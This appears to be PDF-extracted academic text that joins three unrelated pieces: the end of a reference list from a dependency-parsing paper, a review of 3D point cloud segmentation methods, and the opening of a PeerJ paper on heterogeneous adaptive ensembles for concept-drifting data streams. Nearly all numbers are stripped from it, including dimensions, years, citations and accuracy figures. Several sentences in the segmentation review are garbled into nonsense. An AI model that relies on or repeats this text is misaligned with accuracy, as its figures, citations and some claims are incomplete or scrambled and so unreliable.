linguistics., pages – . andrew mccallum, dayne freitag, and fernando pereira. . maximum entropy markov models for information extraction and segmentation. in pro- ceedings of the international conference in machine learning., volume , pages – . vinod nair and geoffrey e. hinton. . rectified lin- ear units improve restricted boltzmann machines. in proceedings of the international conference on ma- chine learning., pages – . joakim nivre and mario scholz. . deterministic dependency parsing of english text. in proceedings of the international conference on computational lin- guistics., coling ’ , stroudsburg, pa, usa. asso- ciation for computational linguistics. joakim nivre, johan hall, sandra kübler, ryan mc- donald, jens nilsson, sebastian riedel, and deniz yuret. . the conll shared task on depen- dency parsing. in proceedings of the conll shared task session of emnlp-conll , pages – , prague, czech republic. association for computa- tional linguistics. joakim nivre. . algorithms for deterministic incre- mental dependency parsing. 
computational linguis- tics, ( ): – . stephane ross, geoffrey j. gordon, and j. andrew bagnell. . a reduction of imitation learning and structured prediction to no-regret online learning. journal of machine learning research – proceedings track, . kenji sagae and jun’ichi tsujii. . dependency pars- ing and domain adaptation with lr models and parser ensembles. in proceedings of the conll shared task in the joint conferences on empirical methods in natural language processing and computational natural language learning (emnlp-conll), pages – . ashish vaswani, yinggong zhao, victoria fossum, and david chiang. . decoding with large-scale neu- ral language models improves translation. in proceed- ings of empirical methods in natural language pro- cessing., pages – . citeseer. david weiss, chris alberti, michael collins, and slav petrov. . structured training for neural network transition-based parsing. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long pa- pers), pages – , beijing, china, july. associa- tion for computational linguistics. hiroyasu yamada and yuji matsumoto. . statistical dependency analysis with support vector machines. in the th international workshop of parsing tech- nologies (iwpt ). majid yazdani and james henderson. . incre- mental recurrent neural network dependency parser with search-based discriminative training. in proceed- ings of the nineteenth conference on computational natural language learning, pages – , beijing, china, july. association for computational linguis- tics. yue zhang and stephen clark. . a tale of two parsers: investigating and combining graph-based and transition-based dependency parsing using beam- search. in proceedings of the conference on em- pirical methods in natural language processing, emnlp ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. hao zhang and ryan mcdonald. . enforcing struc- tural diversity in cube-pruned dependency parsing. in proceedings of the association for computational lin- guistics, pages – . association for computa- tional linguistics. yue zhang and joakim nivre. . transition-based dependency parsing with rich non-local features. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: human lan- guage technologies, pages – , portland, ore- gon. association for computational linguistics. kai zhao, james cross, and liang huang. . op- timal incremental parsing via best-first dynamic pro- gramming. in proceedings of the conference on empirical methods in natural language processing, pages – . paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - review of d point cloud data segmentation methods ruan xiaoyi school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com liu baolong school of computer science and engineering xi’an technological university xi’an, , china e-mail: liu.bao.long@hotmail.com abstract— d point cloud segmentation is one of the key steps in point cloud processing, which is the technology and process of dividing the point cloud data set into several specific regions with unique properties and proposing interesting targets. it has important applications in medical image processing, industrial inspection, cultural relic’s identification and d visualization. 
despite widespread use, point cloud segmentation still faces many challenges because of the uneven sampling density, high redundancy, and lack of explicit structure of point cloud data. the main goal of this paper is to analyse the most popular algorithms and methodologies to segment point clouds. to facilitate analysis and summary, according to the principle of segmentation we divide the d point cloud segmentation methods into edge-based methods, region-based methods, graph-based methods, model-based methods, and machine learning-based methods. we then analyze and discuss the advantages, disadvantages and application scenarios of these segmentation methods. for some algorithms the results of the segmentation and classification are shown. finally, we outline the issues that need to be addressed and important future research directions.

keywords: line point cloud; segmentation; classification

i. introduction

image segmentation is one of the basic research directions of computer vision, and its purpose is to subdivide a digital image into multiple regions with similar properties[ ]. segmentation of d images has more than years of research history, but d point cloud data is a highly redundant and irregularly ordered structure, so point cloud segmentation also faces many challenges. the segmentation of point clouds into foreground and background is a fundamental step in processing d point clouds. given the set of point clouds, d point cloud segmentation can be defined with the following sets: let f = {f_1, ..., f_n} be the surface set reconstructed from the point set s, and let r = {r_1, ..., r_n} be a subset of the power set of s. each element in r is a set of points corresponding to a certain characteristic surface in f, which represents a region obtained by segmentation. if the following conditions are met, r is called a partition of the point set s:

1) ∪_{i=1}^{n} r_i = s, indicating that the union of the divided regions is the measured point set s, that is, each measurement point is assigned to some region.

2) r_i ∩ r_j = ∅ for i ≠ j, indicating that the point sets obtained by segmentation do not intersect each other, and each measurement point cannot belong to two different regions at the same time.

3) the points in each region have the same characteristics, and any two adjacent regions do not have the same characteristics.

4) ∀ i ∈ {1, 2, ..., n}, r_i is a connected region.

ii. methods summary

based on the principle used for segmentation, we divide the d point cloud segmentation methods into edge-based methods, region-based methods, graph-based methods, model-based methods, and machine learning-based methods.

a. edge-based methods

the edge-based segmentation method is currently the most studied method[ ]. edges are the basic features that describe the shape of point cloud objects (figure ). the edge-based segmentation method first detects the geometric boundary points of the data points. the edge of the point cloud is usually composed of boundary points where the normal vector or the curvature of the point cloud changes abruptly. these boundary points
subsequently, jiang[ ] proposed a fast segmentation method using scanline grouping technology. the scan lines of the distance image are divided into curves and then they are clustered to represent the surface. this method is better than bhanu 's method in segmentation quality and running time , but it is not suitable for point clouds with uneven density. sappa[ ] proposed a new edge detection method. by performing edge detection on binary maps, extracting closed contours for fast segmentation; wang et al.[ ] proposed a fast point cloud edge detection algorithm. first, the point cloud data is grid-organized to exclude non-edge discrete points. finally, alphashapes judgment conditions are used to fficiently extract edges, which can effectively avoids the problem of extracting outer boundaries and holes. (a)original point cloud (b) the edge of data a. figure . point cloud and its edge the advantage of edge-based segmentation is that it has good segmentation results for data with strong contrast in different regions, and can detect the edges of different regions very intuitively. the disadvantage is that although it detects all the edges, it is difficult to determine the detection, the relationship between the edge of the target area and the boundary of the target area. in addition, such algorithms are very sensitive to noise and are not suitable for objects with smooth surface changes. b. area-based methods the region-based method classifies nearby points with similar attributes by searching for neighborhood information to achieve the purpose of segmentation. in zucker[ ] proposed a " region grow " should be split for d images, the researchers used after being d point cloud. the segmentation as shown in follows the figure . firstly, a small piece of seed region is given to the segmentation target, and the seed region is used as a starting point to search for the neighborhood; the curvature, normal vector, and geometric features of the point cloud are used as standards; if a point meets the criteria for seed growth, the point is incorporated into the seed region, and the process is repeated as a new seed point, until all points are detected, a growth region is formed. the segmentation results are shown in figure . however, this method has the problems of being easily affected by noise and easily causing the problem of segmentation holes and excessive segmen- tation. [ - ]. figure . area-based methods flow chart (a)original point cloud (b)segmented by region grow figure . example of region grow segmentation many scholars then the algorithm is improved. zhang[ ] use otsu determining the optimal segmetati- on threshold as a constraint condition of growth, better than the traditional segmentation methods, but is susceptible to noise; angelina et al.[ ] improved the region growing method with region merging and genetic algorithms, and its segmentation efficiency has been improved to some extent, but the boundary retention is poor; xiao et al.[ ] proposed clustering- international journal of advanced network, monitoring and controls volume , no. 
, based adaptive region growth for road image segmentation method, but its scope of application is limited; besl et al.[ ] divide the image into regions based on the curvature characteristics by calculating the gaussian and average curvature of the point cloud surface, set seed nodes for these regions, and then use polynomial simulation this method is highly suscep- tible to noise and is time-consuming; chen et al.[ ] calculated the ratio of the minimum eigenvalue of each point and the sum of the three eigenvalues by decom- posing the covariance matrix, and the ratio was minimum point as a seed point, the process is mainly used in the building plane extraction rule, the high cost of time; vosselman et al.[ ] use randomly selecting seed sampling points, is determined these seed point whether neighborhood can be fitted to a predetermined model, but the method is prone to false segmentation; koster[ ] using the generated information in a relatively irregular pyramid fig between the storage area, for comparing and merging adjacent regions; pu [ ] planar surface of the growth surface segmentation algorithm laser transactions; ning seats[ ] proposed a two-step method based on the coarse segmentation and fine segmentation, for extracting the main subject in the scene and finer details. the region-based method is more accurate than the edge-based method. for the seed method, the segmen- tation effect is directly related to the selection of the seed points. the quality of the seeds and the merge rules determine the segmentation effect, and this method is extremely susceptible to noise, causes over or under segmentation. c. model-based approach this method is based on geometric shapes such as spheres, cones, planes, and cylinders to group point clouds. according to these shapes, points with the same mathematical model will be divided into the same region. the most typical algorithm is fischer[ ] random sample consensus algorithm (ransac) and the improvement of the method. ransac achieves segmentation by detecting features with regular geome- tric shapes such as planes, spheres, and cylinders. the basic principle of the algorithm is to calculate the mathematical model parameters of the data based on a set of sample data sets containing abnormal data to obtain valid sample data. figure compares the least squares method with the ransac algorithm. the results are shown in noisy data in addition, ransac can more effectively fit the target. ransac is widely used in the extraction of building surfaces; li[ ] proposed an efficient ran- sac based algorithm on traditional ransac, which has good performance. noise immunity to segment millions of point clouds of a sample in less than a minute. hough transform the detection points into hough space[ ]. then a voting algorithm is used to detect objects with a specific shape, so that the problem of detecting arbitrary shapes is transformed into a statistical peak problem[ ], which is mostly used for the detection of circles and ellipses. document[ ] compared ransac and d hough transform results show d hough transform segment parameter values slower and more sensitive, ransac the detection result in the time segments and run more efficiently. however, when ransac is applied to plane detection, the “pseudo-plane” problem often occurs. to solve this problem, an improved ransac method[ ] based on normal distribution transfor-mation (ndt) units, which is accurate. the rate can reach more than . %, and the plane integrity exceeds . %. 
in most cases, methods based on model fitting need the geometric model to be detected to be specified in advance. zhang et al.[ ] provide a multi-model fitting method based on splitting and merging, which eliminates the need to set the number of models in advance; in this way, automatic segmentation of the point cloud is realized.
figure . comparison of least squares fitting (a) and ransac (b).
the model-based method has pure mathematical principles, is fast and robust, and can handle heterogeneous data. its main limitation is its inaccuracy when dealing with different kinds of point clouds. the method has been implemented in point cloud libraries for various models based on lines, planes, circles, and so on.
d. graph theory-based approach
graph theory-based segmentation applies the principle of graph partitioning to segment the point cloud. this type of algorithm models the point cloud as a graph composed of nodes and of edges that reflect the relationships between the nodes. graph theory-based optimal segmentation is typified by the fh algorithm proposed by felzenszwalb and huttenlocher[ ]. this method constructs a weighted undirected graph with the points as vertices, computes rgb differences between vertices to construct the edge weights, and merges regions accordingly. chen[ ] achieves automatic segmentation by building a k-nearest neighbor graph, adding background constraints, and finding the minimum cut; compared with several segmentation methods, the results show that this approach is suitable for separating foreground from background, for extracting a specified target, or for multi-target extraction in a supervised classification manner. ural et al.[ ] assume a conditional random field model and use a graph cut algorithm to disconnect parts of the graph model into independent regions according to the maximum a posteriori estimation criterion. li et al.[ ] proposed a progressive two-level optimal segmentation algorithm: first, the topological relationships and distance measurement characteristics of the points are computed under a riemannian geometry frame and k-means clustering is used to obtain segmented voxels as the bottom-level result; then the voxels of the point cloud are modeled as nodes, a minimum spanning tree is constructed, high-level feature information of the nodes is extracted, and the fine segmentation of the point cloud details is obtained by graph optimization. much of the work on graph-based methods has been invested in probabilistic inference models, such as the conditional random field (crf) method, which uses crfs to label points with different geometric surface primitives. graph theory-based methods can efficiently segment point clouds even in complex backgrounds, but they often lack real-time performance[ ].
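as a toy illustration of the graph-based idea (build a neighborhood graph, weight the edges by similarity, and split the graph into components), the sketch below segments a point cloud by dropping k-nearest-neighbor edges longer than a threshold and taking connected components; it is a deliberate simplification, not a reimplementation of the fh, min-cut, or crf methods above, and the parameters are placeholders.

import numpy as np
from scipy.spatial import cKDTree
from scipy.sparse import coo_matrix
from scipy.sparse.csgraph import connected_components

def graph_segmentation(points, k=8, max_edge_len=0.35):
    """label points by connected components of a pruned k-nearest-neighbor graph."""
    n = len(points)
    dists, idxs = cKDTree(points).query(points, k=k + 1)   # first neighbor is the point itself
    rows, cols = [], []
    for i in range(n):
        for dist, j in zip(dists[i, 1:], idxs[i, 1:]):
            if dist <= max_edge_len:        # keep only short edges (nearby, similar points)
                rows.append(i)
                cols.append(j)
    graph = coo_matrix((np.ones(len(rows)), (rows, cols)), shape=(n, n))
    n_regions, labels = connected_components(graph, directed=False)
    return n_regions, labels

# usage: two well-separated clusters should come back as two regions
pts = np.vstack([np.random.rand(200, 3), np.random.rand(200, 3) + 5.0])
print(graph_segmentation(pts)[0])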
e. machine learning-based methods
machine learning treats point cloud segmentation as the classification of point cloud data. yu[ ] proposed a neural network learning method that combines segmentation and classification for target recognition; yang[ ] uses support vector machines to classify geometric features; guan et al.[ ] convert point clouds into voxel data to extract features and then use adaboost for training and target extraction. currently the best-known approach is pointnet by charles et al.[ ], a neural network that operates directly on point sets for 3d classification and segmentation. although pointnet can discriminate the type of object, it lacks robustness to noise and to variations in the data. to solve this problem, charles et al. proposed pointnet++, which can extract local features at different scales and obtain deep features through a multilayer network structure. in addition, zhao et al.[ ] proposed a deep neural network model based on multi-scale features and pointnet for feature classification of lidar point cloud data in complex scenes; this method improves the local feature extraction ability of pointnet and realizes the automatic classification of lidar point clouds in complex scenes. niu[ ] addressed the lack of local topological information in the generated features and proposed a method that uses bisymmetric functions and spatial transformation networks to obtain more robust and more discriminative features; compared with pointnet++, the training time is reduced by % with the same accuracy. the advantages of machine learning-based methods are good classification results and high accuracy. however, these algorithms require large amounts of labeled data as training samples, the objects to be segmented must correspond to targets the model has been trained on, and it is difficult to model the relationships between points, so the algorithms are hard to generalize. a comparison of the point cloud segmentation methods is shown in table i.
table i. comparison of various point cloud segmentation methods.
edge-based methods. advantage: can detect the edges of different areas of a point cloud very intuitively. disadvantage: sensitive to noise and not suitable for objects with smooth surface changes.
region-based methods. advantage: more accurate than edge-based methods. disadvantage: the segmentation result depends on the quality of the seeds and the merging rules; over-segmentation or under-segmentation can occur.
model-based methods. advantage: fast segmentation, handles heterogeneous data, suitable for simple geometric models. disadvantage: difficult to use in complex scenarios.
graph-based methods. advantage: suitable for complex scenes. disadvantage: lack of real-time performance.
machine learning-based methods. advantage: high segmentation accuracy and good recognition results. disadvantage: lack of real-time performance.
iii. conclusion
point cloud segmentation is a necessary step for target detection and 3d reconstruction. this paper reviews some classic point cloud segmentation methods and analyzes their advantages and disadvantages. as can be seen, although point cloud segmentation has undergone a long period of research, there are still limitations. segmentation methods based on edges and regions have good real-time performance but are sensitive to noise, and the segmentation effect is often not ideal. the method based on model fitting has great limitations, and it is difficult to adapt it to the segmentation requirements of complex environments.
although graph-based and machine learning-based methods can overcome noise and efficiently segment point cloud data, they find it difficult to meet real-time system requirements. therefore, how to overcome the influence of noise and how to improve the real-time performance of the segmentation system remain the focus of point cloud segmentation research.
acknowledgment
the completion of this paper is inseparable from the patient guidance of prof. liu baolong, prof. chen hua, teacher wu qiong, and teacher lipeng si. i also thank the other teachers and students in this laboratory for their help. finally, i would like to thank the science and technology program of weiyang district of xi'an city (project no.: ) for its funding support.
references
[ ] shapiro l, stockman g. computer vision [m]. prentice hall, .
[ ] luo xiping, tian jie, et al. summary of image segmentation [d]. .
[ ] bhanu b, lee s, ho c, henderson t. range data processing: representation of surfaces by edges [c]. proc. int. pattern recognition conf., : - .
[ ] jiang xy, bunke h, meier u. fast range image segmentation using high-level segmentation primitives [c]. ieee workshop on applications of computer vision, .
[ ] sappa a, devy m. fast range image segmentation by an edge detection strategy [c]. 3d digital imaging and modeling, .
[ ] wang zongyue, ma hongchao, xu honggen, et al. research on water body contour extraction method based on lidar point cloud data [j]. wuhan university journal of information science, : - .
[ ] zucker sw. region growing: childhood and adolescence [j]. computer graphics and image processing, , ( ): - .
[ ] li renzhong, liu yangyang, yang man, et al. 3d point cloud segmentation based on improved region growing [j]. chinese journal of optics, : - .
[ ] gao f. cases of matlab image processing [m]. beijing: posts and telecommunications press, .
[ ] zhang l, guo lm, he w, et al. an image segmentation algorithm based on maximal variance between-class and region growing [j]. information and electronic engineering, : - .
[ ] angelina s, suresh lp, veni sh k. image segmentation based on genetic algorithm for region growth and region merging [c]. computing, electronics and electrical technologies, .
[ ] xiao xiaoming, ma zhi, cai zixing, et al. an adaptive region growing algorithm for road segmentation [j]. control engineering, , ( ).
[ ] besl pj, jain rc. segmentation through variable-order surface fitting [j]. ieee transactions on pattern analysis and machine intelligence, , ( ): - .
[ ] chen j, chen bq. architectural modeling from sparsely scanned range data [j]. international journal of computer vision, .
[ ] vosselman g, gorte bgh, sithole g, et al. recognising structure in laser scanner point clouds [j]. international archives of photogrammetry, remote sensing and spatial information sciences, , ( ): - .
[ ] koster k, spann m. mir: an approach to robust clustering - application to range image segmentation [j]. ieee transactions on pattern analysis and machine intelligence, , ( ): - .
[ ] pu s, vosselman g. automatic extraction of building features from terrestrial laser scanning [j]. international archives of photogrammetry, remote sensing and spatial information sciences, , ( ): - .
[ ] ning x, zhang x, wang y, jaeger m. segmentation of architecture shape information from 3d point cloud [c]. vrcai, : - .
[ ] nguyen a, le b. 3d point cloud segmentation: a survey [c]. ieee conference on robotics, automation and mechatronics (ram), ieee, .
[ ] yan li, xie hong, hu xiaobin, et al. a new hybrid point cloud plane segmentation method [j]. journal of wuhan university (information science edition), : - .
[ ] schnabel r, et al. efficient ransac for point-cloud shape detection [j]. computer graphics forum, , ( ): - .
[ ] hough pvc. method and means for recognizing complex patterns. us patent, .
[ ] tarsha-kurdi f, landes t, grussenmeyer p. hough-transform and extended ransac algorithms for automatic detection of 3d building roof planes from lidar data [j], .
[ ] li l, yang f, zhu h, et al. an improved ransac for 3d point cloud plane segmentation based on normal distribution transformation cells [j]. remote sensing, : - .
[ ] zhang liangpei, z yun, c zhenzhong, et al. splitting and merging based multi-model fitting for point cloud segmentation [j]. acta geodaetica et cartographica sinica, .
[ ] felzenszwalb pf, huttenlocher dp. efficient graph-based image segmentation [j]. international journal of computer vision, , ( ): - .
[ ] chen x, golovinskiy a, funkhouser t. a benchmark for 3d mesh segmentation [j]. acm transactions on graphics (tog), , ( ): - .
[ ] ural s, shan j. min-cut based segmentation of airborne lidar point clouds [c]. international archives of the photogrammetry, remote sensing and spatial information sciences, xxxix-b , melbourne, australia: isprs, : - .
[ ] li minglei, liu shaochuang, yang huan, et al. a two-level optimized lidar point cloud scene segmentation method [j]. journal of surveying and mapping, , ( ): - .
[ ] andoni a, indyk p. near-optimal hashing algorithms for approximate nearest neighbor in high dimensions [c]. proceedings of the annual ieee symposium on foundations of computer science, berkeley, ca, usa: ieee, : - .
[ ] yu yongtao, li j, guan haiyan, et al. learning hierarchical features for automated extraction of road markings from 3-d mobile lidar point clouds [j]. ieee journal of selected topics in applied earth observations and remote sensing, , ( ): - .
[ ] pang guan, neumann u. training-based object recognition in cluttered 3d point clouds [c]. proceedings of the international conference on 3d vision (3dv), seattle, wa, usa: ieee, : - .
[ ] yang bisheng, mei baoyan. research on 3d city model visualization [d]. .
[ ] qi cr, su h, mo k, et al. pointnet: deep learning on point sets for 3d classification and segmentation [c]. proceedings of the ieee conference on computer vision and pattern recognition, : - .
[ ] zhao zhongyang, cheng yinglei, shi xiaosong, et al. lidar point cloud feature classification method based on multi-scale features and pointnet [j]. progress in laser and optoelectronics, , ( ).
[ ] niu chengeng, liu yujie, li zongmin, et al. method of 3d target recognition and model segmentation based on point cloud data [j]. journal of graphics, , ( ): - .
classification of the drifting data streams using heterogeneous diversified dynamic class-weighted ensemble
martin sarnovsky and michal kolarik, department of cybernetics and artificial intelligence, faculty of electrical engineering and informatics, technical university in kosice, kosice, slovakia
abstract
data streams can be defined as continuous streams of data coming from different sources and in different forms. streams are often very dynamic, and their underlying structure usually changes over time, which may result in a phenomenon called concept drift.
when solving predictive problems using streaming data, traditional machine learning models trained on historical data may become invalid when such changes occur. adaptive models equipped with mechanisms to reflect the changes in the data have proved suitable for handling drifting streams. adaptive ensemble models represent a popular group of these methods used in the classification of drifting data streams. in this paper, we present a heterogeneous adaptive ensemble model for data stream classification, which utilizes a dynamic class weighting scheme and a mechanism to maintain the diversity of the ensemble members. our main objective was to design a model consisting of a heterogeneous group of base learners (naive bayes, k-nn, decision trees), with an adaptive mechanism which, besides the performance of the members, also takes into account the diversity of the ensemble. the model was experimentally evaluated on both real-world and synthetic datasets. we compared the presented model with other existing adaptive ensemble methods, both from the perspective of predictive performance and computational resource requirements.
subjects: algorithms and analysis of algorithms, data mining and machine learning, data science
keywords: ensemble learning, concept drift, data streams, adaptive ensemble
introduction
nowadays, the size of data is growing much faster than in the past. information is being collected from household appliances, tools, mobile devices, vehicles, sensors, websites, social networks, and many other devices. an increasingly large number of organizations are starting to analyze large volumes of data, as the information obtained from these data can provide a competitive advantage over other businesses. data collection from devices is often continuous, and the data come in the form of data streams. data stream classification is an active field of research, as more and more data sources can be considered streaming data. when solving classification tasks using streaming data, the data generation process is not strictly stationary, and its underlying structure may change over time. the changes in the underlying data distribution within the streams may result in dynamic, non-stationary target concepts (gama et al., ; Žliobaite, ). this phenomenon is called concept drift, and from the perspective of training classification models on drifting data, the most crucial requirement is the ability of the model to adapt and incorporate new data in order to react to potential changes (barddal et al., ). adaptive learning algorithms are advanced machine learning methods that can reflect the changing concepts in data streams in real time.
multiple approaches have been proposed to extend standard machine learning models with the ability to adapt to changes in streams, including drift detectors (gonçalves et al., ; baena-garcía et al., ) and various sliding window techniques (bifet & gavaldà, ). ensemble models are a popular classification method, often providing better performance when compared to standard machine learning models (breiman, , ; freund & schapire, ). when processing dynamic data streams, where the concepts change over time, dynamic adaptive ensembles present a suitable method that retains long-present historical concepts while covering newly appearing ones. ensemble methods have proved capable of handling streaming data by updating their base learners (kolter & maloof, ; bifet et al., ; brzeziński & stefanowski, ; gomes et al., ) in either block-based (batch) mode or instance-based (incremental) mode. one of the crucial aspects of ensemble classifiers for static data is to ensure the diversity of the base classifiers within the ensemble. in contrast to the diversity of ensembles for static data (carney & cunningham, ; kuncheva & whitaker, ), which is fairly well studied in the literature, there are fewer studies dealing with ensemble diversity in the presence of concept drift (brzezinski & stefanowski, ; abassi, ). the main objective of the work presented in this paper is the design and implementation of a novel adaptive ensemble classification algorithm. the primary motivation of this study is to design a model capable of handling various types of drift. the proposed method can be characterized as a heterogeneous, chunk-based approach that utilizes different types of base classifiers within the ensemble. the model also uses the q statistic as a metric to measure the diversity between the ensemble members, together with a dynamic weighting scheme. we assume that the creation of a heterogeneous ensemble consisting of different base learners, with an adaptation mechanism that ensures the diversity of its members, can lead to a robust ensemble that is able to handle drifting data efficiently. to confirm these assumptions, we conducted an extensive experimental study in which we evaluated the proposed model's performance on a selection of both real-world and synthetic, generated datasets with different types of concept drift. we also compared the proposed method to other adaptive ensemble methods, including state-of-the-art adaptive ensembles. the main objective was to compare the performance of the methods using standard evaluation metrics, as well as training times and resource consumption. the paper is organized as follows. the background section provides basic definitions of the terms related to data streams and the concept drift therein. the following section is dedicated to the state of the art in the area of adaptive ensemble models used to handle concept drift and defines the motivation for the presented approach. the next section describes the designed and implemented adaptive ensemble method. we then describe the datasets used in the experimental evaluation. the experimental results section summarizes the conducted experiments and the achieved results. concluding remarks and possibilities for future work in this area are then summarized.
background
a data stream is defined as an ordered sequence of data items that appear over time.
data streams are usually unbounded, ordered sequences of data elements ⟨x1, x2, …, xj, …⟩ that appear sequentially, item by item, from the stream source (gama, aguilar-ruiz & klinkenberg, ). each stream element is generated using a probability distribution pj. the time interval between the particular elements of the stream may vary. particular data elements in the stream are usually of standard size, and most data streams are generated at high speed, i.e., the elements in the data streams appear rapidly. compared with static data, which is usually analyzed offline, data streams need to be analyzed in real time. the differences between processing data streams and processing static data can be summarized according to gama ( ):
- the data elements in the stream arrive online or in batches. elements appearing online are processed one by one, and batches usually have the same size and are processed at once.
- the processing system has no control over the order in which data elements appear, either within a data stream or across multiple data streams.
- data streams are potentially unbounded in size. the size of the particular elements is usually small; in contrast, the entire data size may be huge, and it is generally impossible to store the whole stream in memory.
- once an element from a data stream has been processed, it is usually discarded. it cannot be retrieved unless it is explicitly stored in memory.
data streams can be divided into two groups:
- stationary data streams: the data distribution does not change over time, i.e., the stream elements are generated from a fixed probability distribution;
- non-stationary data streams: the data are evolving, and the data distribution may change over time. usually, these changes may also affect the target concepts (classes).
concept drift
when solving predictive data analytical tasks on static data, the data distribution usually does not change, and the data used for training and testing the model have the same distribution. when processing data streams, we often observe the changing nature of the data; in predictive data stream analytical tasks, we experience a phenomenon called concept drift. concept drift is related to the data distribution pt(x, y), where x = (x1, x2, …, xn) is a data sample represented by an n-dimensional feature vector appearing at time t, and y
the concept drift phenomenon may occur in various real-world data and corresponding applications (Žliobaite, pechenizkiy & gama, ): � computer systems or networks, through network intrusion detection, where new techniques and methods may appear (liu et al., ; mukkavilli & shetty, ); � industry, when dynamic data streams are produced by sensors in production equipment and machines (lin et al., ; zenisek, holzinger & affenzeller, ); � marketing and management, when users change their buying behavior and their preferences (black & hickey, ; chiang, wang & chu, ; lo et al., ); � medical data, e.g., in the case of antibiotic resistance (stiglic & kokol, ; tsymbal et al., ); � social networks, when users change their behavior and generated content (lifna & vijayalakshmi, ; li et al., ); � spam categorization, where spam keywords can change over time (delany et al., ; ruano-ordás, fdez-riverola & méndez, ). the authors in tsymbal ( ), Žliobaite ( ) and khamassi et al. ( ) describe a complex taxonomy of existing drift types. in general, there are several different types of concept drift, based on how the phenomenon occurs within the data stream: � sudden/abrupt—in this case, the concept change occurs suddenly. a concept (e.g., a target class) is suddenly replaced by another one. for example, in the topic modeling domain, the main topic of interest may unexpectedly switch to a different one. � incremental—changes in the data distribution are slower and proceed over time. changes are not as visible as in a sudden drift, but they gradually emerge. the changes are usually relatively slow and can be observed when comparing the data over more extended time periods. � gradual—in this drift type, both concepts are present, but over time, one of them decreases, while the other one increases. for example, such a change may reflect the evolution of points of interest, e.g., when a point of interest is gradually being replaced by a newer one. � re-occurring—a previously active concept reappears after some time. re-occurrence may appear in cycles or not (e.g., reappearing fashion trends). besides the mentioned drift types, some publications (gama et al., ) distinguish between two kinds of concept drift: real drift and virtual drift. virtual concept drift is defined by the changes in data distribution but does not affect the target concept. sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ real concept drift (also called concept shift) represents a change in the target concept, which may modify the decision boundaries. figure visualizes the drift types. in concept drift detection, it is also necessary to distinguish between the drift and outlier occurrence. outliers may produce false alarms when detecting the concept drift. when processing the non-stationary drifting streams, the necessary feature of the predictive algorithms is their ability to adapt. some of the algorithms are naturally incremental (e.g., naive bayes), while others require significant changes in the algorithm structure to enable incremental processing. therefore, the learning algorithms applied on the drifting streams are usually extended with a set of mechanisms, which enhance the models with the ability of continuously forgetting the obsolete learned concepts and updating the model with the newly arrived data in the stream. there are several types of models used to handle concept drift. to detect the concept drift in data streams, we can use drift detectors. 
these can detect possible concept drift by analyzing the incoming data or by monitoring the classifier performance. detectors process the signal from the data about changes in data stream distribution. drift detectors usually signalize drift occurrence and trigger the updating/replacement of the classifier. there are several drift detection methods available (gonçalves et al., ), and the drift detection method (ddm) (gama et al., ), the early drift detection method (eddm) (baena-garcía et al., ), and adwin (bifet & gavaldà, ) are the most popular. for predictive data modeling applied on the drifting streams, advanced adaptive supervised machine learning methods are used. supervised learning methods used for drifting stream classification could be categorized from several perspectives, depending on how they approach the adaptation (ditzler et al., ; krawczyk et al., ): � active/passive—active methods usually utilize drift detection methods to detect the drift and to trigger the model update. passive methods periodically update the model, without any knowledge of the drift occurrence. figure concept drift types according to gama et al. ( ). (a) sudden/abrupt, (b) incremental, (c) gradual, (d) re-occuring. full-size doi: . /peerj-cs. /fig- sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � chunk-based/online—chunk-based methods process the streaming data in batches (each batch consists of a specified fixed number of stream elements). online methods process the stream elements separately when they appear. ensemble models represent a popular solution for the classification of drifting data streams. an ensemble classification model is composed of a collection of classifiers (also called base learners, ensemble members, or experts) whose individual decisions are combined (most often by voting) to classify the new samples (sagi & rokach, ). the main idea of the ensemble model is based on the assumption that a set of classifiers together can achieve better performance than individual classifiers (kuncheva & whitaker, ). the selection of the ensemble experts is a crucial factor, as the ideal ensemble consists of a set of diverse base learners. ensemble models are also suitable for data stream classification, where target concepts change over time. the following section summarizes the use of ensembles in the classification of drifting streams. related work there are several approaches to the design of adaptive ensemble models. some of them use the same technique as approaches to static data processing, such as online boosting (wang & pineau, ), which is based on the classic boosting method, extended with online processing capabilities. for adaptation to concept drift, it uses concept drift detection. if a concept drift occurs, the entire model is discarded and replaced by a new model. another well-known model is the ozabagging (oza, ) ensemble. unlike bagging for static data, ozabagging does not use random sampling from the training data, but each of the samples is trained k times, which leads to a poisson distribution. further studies have focused on the design of the ensemble models that would be simple (in terms of their run time) and able to adapt to the concept drift dynamically. for example, the accuracy weighted ensemble (awe) (brzeziński & stefanowski, ) uses the assignment of weight to the base classifiers based on a prediction error. 
old and weak members are gradually being replaced by the new ones, with a lower error rate. the update mechanism is based on the assumption that the latest training chunk will better represent the current test chunk. another model, dynamic weighted majority (dwm) (kolter & maloof, ), dynamically changes the weights of the base classifiers in the case of incorrect classification. a new classifier is added if the model incorrectly classifies the training example, and old classifiers are discarded if their weights fall below a threshold value. online bagging and boosting algorithms were recently used as a basis for more advanced streaming ensembles, such as adaptive ensemble size (aes) (olorunnimbe, viktor & paquet, ), which dynamically adapts the ensemble size, or an approach (junior & nicoletti, ), where boosting is applied to the new batches of data and maintains the ensemble by adding the base learners according to the ensemble accuracy rate. learn++ (inspired by adaboost) is an incremental learning ensemble approach consisting of base learners trained on a subset of training data and able to learn the new classes (polikar et al., ). several modifications of this approach exist, focused on improvement of the number of generated ensemble members sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (muhlbaier, topalis & polikar, ). the random forests method is probably the most popular ensemble method on static data at present. its adaptive version for stream classification, adaptive random forests (arf), was introduced in gomes et al. ( ) and has shown a high learning performance on streaming data. more recently, multiple adaptive versions of popular ensemble methods gaining improved performance or achieving speedup in execution have been introduced, e.g., the adaptive extreme gradient boosting method (montiel et al., ), the streaming active deep forest method (luong, nguyen & liew, ), or random forests with an implemented resource-aware elastic swap mechanism (marrón et al., ). all ensemble models work with the assumption of the diversity of the individual classifiers in the ensemble, while the diversity is achieved in different ways. diversity can help in evolving data streams, as the most suitable method may also change as a result of the stream evolution pesaranghader, viktor & paquet ( ). diverse ensembles by themselves 